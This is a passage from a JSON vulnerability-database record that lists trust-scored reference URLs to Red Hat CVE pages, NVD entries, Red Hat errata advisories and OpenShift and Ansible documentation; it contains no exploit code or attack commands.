        "url": "https://access.redhat.com/security/cve/cve-2020-13631"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12723"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17006"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-12749"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-12401"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12402"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14866"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-17006"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-11719"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12401"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-17023"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17023"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-12749"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-6829"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-14866"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-12403"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12400"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-12723"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11756"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-11756"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-12243"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-12400"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-11727"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12243"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11719"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11727"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12403"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-17498"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17498"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-12402"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2020:5614"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-rel"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2020:5615"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27836"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-15862"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-16166"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-27836"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8177"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.6/updating/updating-cluster"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2020:5623"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19770"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-11668"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25662"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8624"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-16300"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14466"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-10105"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25684"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.7/updating/updating-cluster"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-24490"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-2007"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9925"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-15166"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19072"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9802"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8649"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-26160"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12655"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-16230"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-9458"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9895"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8625"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-13225"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-13249"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-27846"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19068"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20636"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-15925"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8812"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-18808"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3899"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-18809"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8819"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10103"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14467"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14469"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11068"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3867"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-16229"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8720"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9893"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8808"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14553"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3902"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14465"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14882"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20054"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8623"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-16227"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12826"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-18197"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3900"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8566"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25683"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14461"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19602"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14881"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9805"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14464"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8820"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9807"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8769"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8710"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8813"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10773"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25661"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9850"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14463"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10749"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25641"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-6977"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8811"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8647"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16228"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14879"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-29652"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9803"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-15917"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9862"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10774"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14469"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-7774"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10105"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14880"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3885"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-15503"
      },
      {
        "trust": 0.1,
        "url": "https://\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14461"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-0305"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12659"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-1716"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10018"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20812"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14468"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-15157"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8835"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-6978"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25658"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-0444"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8764"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14466"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8844"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-16233"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3865"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14882"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16452"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3864"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16227"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25694"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14464"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14553"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-2752"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16230"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20386"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14391"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-15999"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14468"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14467"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14462"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19543"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3862"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14880"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25682"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14881"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-2574"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3901"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-17546"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10751"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16300"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-3884"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10763"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8823"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14462"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16229"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10942"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8622"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-28362"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3895"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19062"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-11793"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19046"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12465"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19447"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25696"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9894"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25685"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8816"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-16231"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9843"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8771"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-16451"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3897"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14381"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-10103"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-16228"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9806"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19056"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19524"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14463"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8814"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8648"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12770"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8743"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19767"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3121"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19533"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9915"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25686"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8815"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19537"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-2922"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25687"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-16167"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16451"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8783"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-9455"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20807"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-11565"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19332"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-12614"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14879"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14019"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14470"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25681"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19063"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14470"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8619"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14465"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-11068"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19319"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8766"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8563"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10732"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-16452"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8846"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3868"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3894"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8782"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3898"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2020:5634"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-11023"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20372"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10878"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-20228"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-20253"
      },
      {
        "trust": 0.1,
        "url": "https://docs.ansible.com/ansible-tower/latest/html/upgrade-migration-guide/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-11023"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:0778"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-11022"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10543"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-20191"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-20180"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-5766"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10878"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-20178"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-5766"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20372"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-11022"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10543"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-35678"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:0056"
      },
      {
        "trust": 0.1,
        "url": "https://issues.jboss.org/):"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10726"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19906"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20387"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13050"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13627"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17450"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10723"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10725"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10723"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10725"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-5018"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-16168"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20916"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10722"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10722"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20218"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13631"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10029"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20454"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13630"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19221"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10726"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15165"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-16935"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2020:5364"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14889"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:1129"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25645"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_3scale_api_management"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25656"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-5188"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19126"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-28374"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14351"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25705"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_3scale_api_management/2.10/html-single/installing_3scale/index"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-29661"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-20265"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-0427"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14351"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19532"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-7053"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-5094"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14040"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-5188"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9283"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19126"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-5094"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-0427"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19532"
      },
      {
